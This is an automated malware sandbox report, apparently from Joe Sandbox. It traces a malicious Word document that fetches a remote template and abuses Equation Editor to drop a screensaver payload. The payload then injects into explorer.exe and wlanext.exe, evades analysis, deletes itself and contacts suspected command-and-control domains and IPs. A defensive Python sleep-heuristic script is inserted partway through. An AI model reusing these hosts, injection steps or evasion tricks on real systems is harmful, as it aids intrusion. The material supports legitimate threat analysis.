      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\nelb82019.scr "C:\Users\user\AppData\Roaming\nelb82019.scr"
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Process created: C:\Users\user\AppData\Roaming\nelb82019.scr "C:\Users\user\AppData\Roaming\nelb82019.scr"
      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
      Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\nelb82019.scr"
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: credssp.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ncrypt.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: bcrypt.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: gpapi.dll
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Section loaded: wow64win.dll
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Section loaded: wow64cpu.dll
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Section loaded: version.dll
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Section loaded: bcrypt.dll
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Section loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Section loaded: amsi.dll
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Section loaded: riched20.dll
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Section loaded: rpcrtremote.dll
      Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\explorer.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: wow64win.dll
      Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: wow64cpu.dll
      Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64win.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64cpu.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
      Source: Order-1351125X.docx.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\Order-1351125X.docx.doc
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: Order-1351125X.docx.doc | Initial sample: OLE zip file path = word/_rels/settings.xml.rels
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: nelb82019.scr, 0000000A.00000002.400627339.0000000000400000.00000004.08000000.00040000.00000000.sdmp, nelb82019.scr, 0000000A.00000002.403235071.0000000002241000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: nelb82019.scr, nelb82019.scr, 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000002.923627309.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000003.410817092.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000003.411178144.0000000000A40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wlanext.pdb source: nelb82019.scr, 0000000B.00000002.410869004.0000000000544000.00000004.00000020.00020000.00000000.sdmp, nelb82019.scr, 0000000B.00000002.410776116.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp
      Source: Order-1351125X.docx.doc | Initial sample: OLE indicators vbamacros = False
      Source: nelb[1].scr.9.dr | Static PE information: 0xD91CB953 [Tue Jun 5 00:12:03 2085 UTC]
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_005C5357 push ecx; ret 9_2_005C535B
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_005C534F push ecx; ret 9_2_005C5353
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_005C5342 push ecx; ret 9_2_005C534B
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_005B9170 push eax; retf 9_2_005B9171
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_005C5310 push ecx; ret 9_2_005C5313
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_005BA5C0 push eax; retn 005Bh 9_2_005BA5C1
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_005B01F4 push eax; retf 9_2_005B01F5
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_0092DFA1 push ecx; ret 11_2_0092DFB4
      Source: C:\Windows\explorer.exe | Code function: 13_2_081F19B5 push esp; retn 0000h 13_2_081F1AE7
      Source: C:\Windows\explorer.exe | Code function: 13_2_081F1B1E push esp; retn 0000h 13_2_081F1B1F
      Source: C:\Windows\explorer.exe | Code function: 13_2_081F1B02 push esp; retn 0000h 13_2_081F1B03
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D659B5 push esp; retn 0000h 13_2_08D65AE7
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D65B1E push esp; retn 0000h 13_2_08D65B1F
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D65B02 push esp; retn 0000h 13_2_08D65B03
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00C08F09 push ecx; ret 14_2_00C08F1C
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0204DFA1 push ecx; ret 14_2_0204DFB4
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_000979C8 push es; retf 14_2_000979C9
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00090B2E push edx; retf 14_2_00090B2F
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0009D495 push eax; ret 14_2_0009D4E8
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0009D4EB push eax; ret 14_2_0009D552
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0009D4E2 push eax; ret 14_2_0009D4E8
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0009D54C push eax; ret 14_2_0009D552
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00087D65 push esi; iretd 14_2_00087D68
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_000965BD push esi; retf 14_2_000965BE
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_0009DEA8 push ebp; iretd 14_2_0009DEAB
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00A4E9B5 push esp; retn 0000h 14_2_00A4EAE7
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00A4EB02 push esp; retn 0000h 14_2_00A4EB03
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00A4EB1E push esp; retn 0000h 14_2_00A4EB1F
      Source: nelb[1].scr.9.dr | Static PE information: section name: .text entropy: 7.407542787832779
      Source: nelb82019.scr.9.dr | Static PE information: section name: .text entropy: 7.407542787832779

      Persistence and Installation Behavior

      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \Device\RdpDr\;:1\universalmovies.top@SSL\DavWWWRoot
      Source: settings.xml.rels | Extracted files from sample: https://universalmovies.top/nelb.doc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\nelb82019.scr
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File dump: nelb[1].doc.0.dr
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File dump: 497AF0F0.doc.0.dr
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Section loaded: netapi32.dll and davhlpr.dll loaded

      Hooking and other Techniques for Hiding and Protection

      Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEB
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wlanext.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | API/Special instruction interceptor: Address: 7731BECA
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | API/Special instruction interceptor: Address: 7731D51A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | API/Special instruction interceptor: Address: 7731D26A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | API/Special instruction interceptor: Address: 7731C18A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | API/Special instruction interceptor: Address: 7731C25A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | API/Special instruction interceptor: Address: 7731BE2A
      Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7731BECA
      Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7731D51A
      Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7731C1DA
      Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7731BFBA
      Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7731BFDA
      Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7731BE2A
      Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7731D26A
      Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7731C18A
      Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7731C25A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 89904 second address: 8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 89B7E second address: 89B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Memory allocated: 240000 memory reserve | memory write watch
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Memory allocated: 2240000 memory reserve | memory write watch
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Memory allocated: 5D0000 memory reserve | memory write watch
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Code function: 11_2_00970101 rdtsc 11_2_00970101
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 1482
      Source: C:\Windows\SysWOW64\wlanext.exe | Window / User API: threadDelayed 9837
      Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_13-13995
      Source: C:\Windows\SysWOW64\wlanext.exe | API coverage: 7.2 %
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3176 | Thread sleep time: -180000s >= -30000s
      Source: C:\Users\user\AppData\Roaming\nelb82019.scr TID: 3236 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\explorer.exe TID: 1340 | Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\explorer.exe TID: 1344 | Thread sleep count: 97 > 30
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 3476 | Thread sleep count: 133 > 30
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 3476 | Thread sleep time: -266000s >= -30000s
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 3476 | Thread sleep count: 9837 > 30
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 3476 | Thread sleep time: -19674000s >= -30000s
      Source: C:\Windows\explorer.exe | Last function: Thread delayed
      Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
      Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrThread delayed: delay time: 922337203685477Jump to behavior
      Source: explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
      Source: explorer.exe, 0000000D.00000002.924123872.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 0000000D.00000002.924123872.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 0000000D.00000002.924123872.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
      Source: explorer.exe, 0000000D.00000002.923839684.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
      Source: explorer.exe, 0000000D.00000002.924123872.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00970101 rdtsc 11_2_00970101
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009200C4 NtCreateFile,LdrInitializeThunk,11_2_009200C4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00910080 mov ecx, dword ptr fs:[00000030h]11_2_00910080
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009100EA mov eax, dword ptr fs:[00000030h]11_2_009100EA
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009326F8 mov eax, dword ptr fs:[00000030h]11_2_009326F8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020526F8 mov eax, dword ptr fs:[00000030h]14_2_020526F8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C10449 GetProcessHeap,HeapFree,14_2_00C10449
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C08F8B SetUnhandledExceptionFilter,14_2_00C08F8B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C08F22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00C08F22
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrMemory allocated: page read and write | page guardJump to behavior
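The "Thread sleep time" and "Thread sleep count" lines above are the sandbox's stall-detection heuristic: a single relative delay of 30000 s or more, or more than 30 delay calls on one thread, is flagged. The block below is an added example and not part of the Joe Sandbox report: a Python re-implementation of that heuristic, run over constructed copies of the report's own lines plus one made-up benign control line. The 30000 s and 30-call thresholds are the ones printed in the report; the one-year "indefinite" cutoff, the line format accepted by the parser and the reading of 922337203685477 as a truncated INT64_MAX are this example's own assumptions.

```python
import re
from collections import defaultdict

# Thresholds printed next to every hit in the report ("-30000s", "> 30").
MAX_SINGLE_SLEEP_S = 30_000
MAX_SLEEP_CALLS = 30
# Own cutoff for "never wakes up": a delay longer than a year is not a real timer.
INDEFINITE_S = 365 * 24 * 3600

# 922337203685477 (the nelb82019.scr delay) is 2**63-1 = 9223372036854775807
# with its last four digits dropped. Assumption: the sample asked for the largest
# representable relative delay and the sandbox rendered it at a coarser scale.
MAX_INT64_PREFIX = (2**63 - 1) // 10_000

# Accept the raw report line ("TID: 3176Thread sleep time ...") as well as a
# copy with a separator between the source column and the description.
_TIME_RE = re.compile(
    r"Source:\s*(?P<image>.+?)\s+TID:\s*(?P<tid>\d+)\W*Thread sleep time:\s*-(?P<secs>\d+)s")
_COUNT_RE = re.compile(
    r"Source:\s*(?P<image>.+?)\s+TID:\s*(?P<tid>\d+)\W*Thread sleep count:\s*(?P<count>\d+)")

# Constructed input: values copied from the report, plus one benign control line
# (notepad.exe) that is not from the report.
SAMPLE_LINES = [
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3176 | Thread sleep time: -180000s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\nelb82019.scr TID: 3236 | Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\explorer.exe TID: 1340 | Thread sleep time: -60000s >= -30000s",
    r"Source: C:\Windows\explorer.exe TID: 1344 | Thread sleep count: 97 > 30",
    r"Source: C:\Windows\SysWOW64\wlanext.exe TID: 3476 | Thread sleep count: 9837 > 30",
    r"Source: C:\Windows\SysWOW64\wlanext.exe TID: 3476 | Thread sleep time: -19674000s >= -30000s",
    r"Source: C:\Windows\System32\notepad.exe TID: 4242 | Thread sleep time: -5s",
]


def parse_sleep_events(lines):
    """Yield (image, tid, kind, value); kind is 'seconds' or 'calls'."""
    for line in lines:
        m = _TIME_RE.search(line)
        if m:
            yield m["image"], int(m["tid"]), "seconds", int(m["secs"])
            continue
        m = _COUNT_RE.search(line)
        if m:
            yield m["image"], int(m["tid"]), "calls", int(m["count"])


def classify_delay(seconds, stall_threshold=MAX_SINGLE_SLEEP_S):
    """'ok', 'stall' (at or above the report's threshold) or 'indefinite' (past one year)."""
    if seconds >= INDEFINITE_S:
        return "indefinite"
    if seconds >= stall_threshold:
        return "stall"
    return "ok"


def flag_sleep_evasion(lines, max_seconds=MAX_SINGLE_SLEEP_S, max_calls=MAX_SLEEP_CALLS):
    """Map (image, tid) -> reasons for every thread whose delays look like sandbox stalling."""
    findings = defaultdict(list)
    for image, tid, kind, value in parse_sleep_events(lines):
        if kind == "seconds" and value >= max_seconds:
            reason = f"{classify_delay(value, max_seconds)}: single delay of {value}s >= {max_seconds}s"
            if value == MAX_INT64_PREFIX:
                reason += " (digits of INT64_MAX)"
            findings[(image, tid)].append(reason)
        elif kind == "calls" and value > max_calls:
            findings[(image, tid)].append(f"{value} delay calls > {max_calls}")
    return dict(findings)


if __name__ == "__main__":
    for (image, tid), reasons in flag_sleep_evasion(SAMPLE_LINES).items():
        print(f"{image} tid={tid}: {'; '.join(reasons)}")
```

Both sides of the heuristic matter: the EQNEDT32.EXE thread is caught by a single long delay, the explorer.exe thread 1344 only by its call count, and wlanext.exe thread 3476 by both, which is why the report lists that thread four times.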

      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe :: Domain query: www.cnoszirzbkaqz.com
Source: C:\Windows\explorer.exe :: Domain query: www.onlynaturlpt.shop
Source: C:\Windows\explorer.exe :: Network Connect: 104.21.89.47 80
Source: C:\Windows\explorer.exe :: Network Connect: 156.241.141.214 80
Source: C:\Windows\explorer.exe :: Domain query: www.turbrun.com
Source: C:\Windows\explorer.exe :: Network Connect: 5.149.161.103 80
Source: C:\Windows\explorer.exe :: Domain query: www.outletivo.com
Source: C:\Windows\explorer.exe :: Network Connect: 15.197.148.33 80
Source: C:\Windows\explorer.exe :: Domain query: www.naddafornadda.com
Source: C:\Windows\explorer.exe :: Network Connect: 192.243.61.227 80
Source: C:\Windows\explorer.exe :: Domain query: www.wirewizardselectric.net
Source: C:\Windows\explorer.exe :: Domain query: www.wzxq.xyz
Source: C:\Windows\explorer.exe :: Network Connect: 167.172.228.26 80
Source: C:\Windows\explorer.exe :: Domain query: www.380747.net
Source: C:\Windows\explorer.exe :: Domain query: www.texanboxes.com
Source: C:\Windows\explorer.exe :: Network Connect: 3.33.130.190 80
Source: C:\Windows\explorer.exe :: Domain query: www.emeraldsurrogatefabric.com
Source: 10.2.nelb82019.scr.22997ac.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs :: Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 10.2.nelb82019.scr.22997ac.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs :: Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 10.2.nelb82019.scr.22997ac.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs :: Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: C:\Windows\SysWOW64\wlanext.exe :: NtMapViewOfSection: Indirect: 0xA49D47
Source: C:\Windows\SysWOW64\wlanext.exe :: NtQueueApcThread: Indirect: 0xA4A531
Source: C:\Users\user\AppData\Roaming\nelb82019.scr :: NtQueueApcThread: Indirect: 0x2AA4F2
Source: C:\Windows\SysWOW64\wlanext.exe :: NtClose: Indirect: 0xA49DC5
Source: C:\Users\user\AppData\Roaming\nelb82019.scr :: NtClose: Indirect: 0x2AA56C
Source: C:\Windows\SysWOW64\wlanext.exe :: NtUnmapViewOfSection: Indirect: 0xA49DB9
Source: C:\Users\user\AppData\Roaming\nelb82019.scr :: Memory written: C:\Users\user\AppData\Roaming\nelb82019.scr base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\nelb82019.scr :: Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\nelb82019.scr :: Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\nelb82019.scr :: Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wlanext.exe :: Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wlanext.exe :: Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\nelb82019.scr :: Thread register set: target process: 1244
Source: C:\Windows\SysWOW64\wlanext.exe :: Thread register set: target process: 1244
Source: C:\Users\user\AppData\Roaming\nelb82019.scr :: Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\nelb82019.scr :: Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: C00000
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE :: Process created: C:\Users\user\AppData\Roaming\nelb82019.scr "C:\Users\user\AppData\Roaming\nelb82019.scr"
Source: C:\Users\user\AppData\Roaming\nelb82019.scr :: Process created: C:\Users\user\AppData\Roaming\nelb82019.scr "C:\Users\user\AppData\Roaming\nelb82019.scr"
Source: C:\Windows\SysWOW64\wlanext.exe :: Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\nelb82019.scr"
Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Progman-
Source: explorer.exe, 0000000D.00000002.923627377.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.401556901.0000000000720000.00000002.00000001.00040000.00000000.sdmp :: Binary or memory string: Program Manager
Source: explorer.exe, 0000000D.00000002.923627377.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.401556901.0000000000720000.00000002.00000001.00040000.00000000.sdmp :: Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000002.923627377.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.401556901.0000000000720000.00000002.00000001.00040000.00000000.sdmp :: Binary or memory string: !Progman
Source: C:\Users\user\AppData\Roaming\nelb82019.scr :: Queries volume information: C:\Users\user\AppData\Roaming\nelb82019.scr VolumeInformation
Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 14_2_00C09186 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 14_2_00C09186
